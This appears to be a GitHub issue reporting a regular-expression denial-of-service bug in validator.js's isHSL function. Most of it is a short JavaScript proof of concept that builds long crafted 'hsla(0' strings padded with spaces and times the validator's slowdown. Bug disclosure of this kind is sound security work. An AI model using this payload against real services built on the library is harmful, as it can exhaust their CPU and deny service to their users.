ReDoS in isHSL #1598
Description
Describe the bug
It allows cause a Regular Expression Denial of Service (REDoS) when checking if the crafted string is a hsl.
Examples
var validator = require("validator")
function build_attack(n) {
var ret = "hsla(0"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret+"◎";
}
for(var i = 1; i <= 50000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
validator.isHSL(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}Additional context
Validator.js version: 14.10.0
Node.js version:
OS platform: windows